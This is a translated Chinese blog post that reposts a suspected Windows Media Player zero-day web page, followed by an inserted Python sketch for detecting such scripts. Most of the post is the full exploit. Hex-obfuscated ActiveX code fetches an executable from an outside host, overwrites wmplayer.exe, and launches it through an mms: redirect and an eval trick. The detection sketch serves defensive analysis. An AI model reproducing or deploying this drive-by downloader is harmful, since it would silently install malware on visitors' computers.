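This article comes from 死性不改's blog, http://www.clxp.net.cn. Please keep this notice when reposting!
Today, while looking at a virus address provided by 蔚蓝彩虹, I happened to notice the following, but my own test did not succeed. I don't know whether this is the next 0day that will be very widely exploited. I am only a security hobbyist and have not studied the field in depth or systematically. I am raising it here and hope nobody throws radishes and cabbages at me.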
Full code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Windows Media Player Oday Test!</title>
</head>
<textarea id="code" style="display:none">
var h=new ActiveXObject("\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x58\x4d\x4c\x48\x54\x54\x50");
h.open("GET","http://www.30356769.cn/killbase/me.exe";,false);
h.send();
var s=new ActiveXObject("\x41\x44\x4f\x44\x42\x2e\x53\x74\x72\x65\x61\x6d");
s.type=1;
s.open();
s.write(h.Responsebody);
s.savetofile("c:\\program files\\windows media player\\wmplayer.exe",2);
s.close;
location.href="\x6d\x6d\x73\x3a";
</textarea>
<script>
var url=document.all.code.value;
url=url.replace(/\r\n/g,"");
url=url.replace(/\\/g,"\\\\");
url=url.replace(/\"/g,"\\\"");
url=url.replace(/\//g,"%2f");
window.open("file:java script:eval(decodeURI(\""+url+"\"))","\x5f\x6d\x65\x64\x69\x61");
</script>
<body>
<p>黑网之神修改</p>
<p>hi.baidu.com/sksgod</p>
</body>
</html>
<title>Windows Media Player Oday Test!</title>
Before long this may well turn into
<title>Windows Media Player Oday !</title>
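A static triage sketch for scripts like the one quoted above, added here as an example and not part of the original post: it decodes the `\xNN` escapes that hide the ActiveX ProgIDs and flags the download-then-overwrite pattern. The function names, the rule set and the sample string (modelled on the post's script, with a placeholder URL) are assumptions made for illustration.

```python
import re

# Constructed sample modelled on the script in the post; the URL is a placeholder.
SAMPLE = r'''
var h=new ActiveXObject("\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x58\x4d\x4c\x48\x54\x54\x50");
h.open("GET","http://example.invalid/payload.exe",false);
h.send();
var s=new ActiveXObject("\x41\x44\x4f\x44\x42\x2e\x53\x74\x72\x65\x61\x6d");
s.type=1;
s.open();
s.write(h.Responsebody);
s.savetofile("c:\\program files\\windows media player\\wmplayer.exe",2);
location.href="\x6d\x6d\x73\x3a";
'''

HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')

def decode_hex_escapes(script):
    """Replace JavaScript \\xNN escapes with the characters they encode."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), script)

# Hypothetical rule set: (finding name, regex applied to the decoded text).
RULES = [
    ("activex_http_client", r'ActiveXObject\(\s*"(?:Microsoft|Msxml2)\.XMLHTTP'),
    ("activex_binary_stream", r'ActiveXObject\(\s*"ADODB\.Stream"'),
    ("writes_executable", r'savetofile\(\s*"[^"]*\.exe"'),
    ("navigates_to_mms", r'location\.href\s*=\s*"mms:'),
]

def triage(script):
    """Return the names of all rules that match after hex-escape decoding."""
    decoded = decode_hex_escapes(script)
    return [name for name, pat in RULES if re.search(pat, decoded, re.IGNORECASE)]

def hidden_strings(script):
    """Decode string literals that consist entirely of \\xNN escapes."""
    literals = re.findall(r'"((?:\\x[0-9a-fA-F]{2})+)"', script)
    return [decode_hex_escapes(lit) for lit in literals]

if __name__ == "__main__":
    print(hidden_strings(SAMPLE))
    print(triage(SAMPLE))
```

Matching on the decoded text matters here: none of the ProgID rules fire against the raw script, because the names only exist as hex escapes until decoded.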
Will the next one to arrive be a Windows Media Player 0day? - 死性不改's Blog~
http://www.clxp.net.cn/article.asp?id=1219#top